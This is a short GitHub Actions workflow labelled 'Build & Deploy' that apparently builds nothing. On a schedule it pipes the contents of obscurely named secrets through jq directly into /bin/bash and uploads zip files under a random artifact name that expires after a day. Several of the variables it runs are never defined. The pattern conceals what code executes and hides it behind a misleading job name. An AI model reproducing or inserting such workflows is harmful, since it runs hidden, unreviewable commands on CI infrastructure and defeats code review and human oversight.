name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '7 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          bf7256: ${{ secrets.bf7256 }}
        run: |
          printf '%s' "$bf7256" | jq -r .n542 | /bin/bash
          printf '%s' "$vzbj2429" | jq -r .kzw402 | /bin/bash
          printf '%s' "$j1616" | jq -r .cqbo35 | /bin/bash
          printf '%s' "$fws153" | jq -r .xfif03 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: O9bp5RL3
          path: "*.zip"
          retention-days: 1
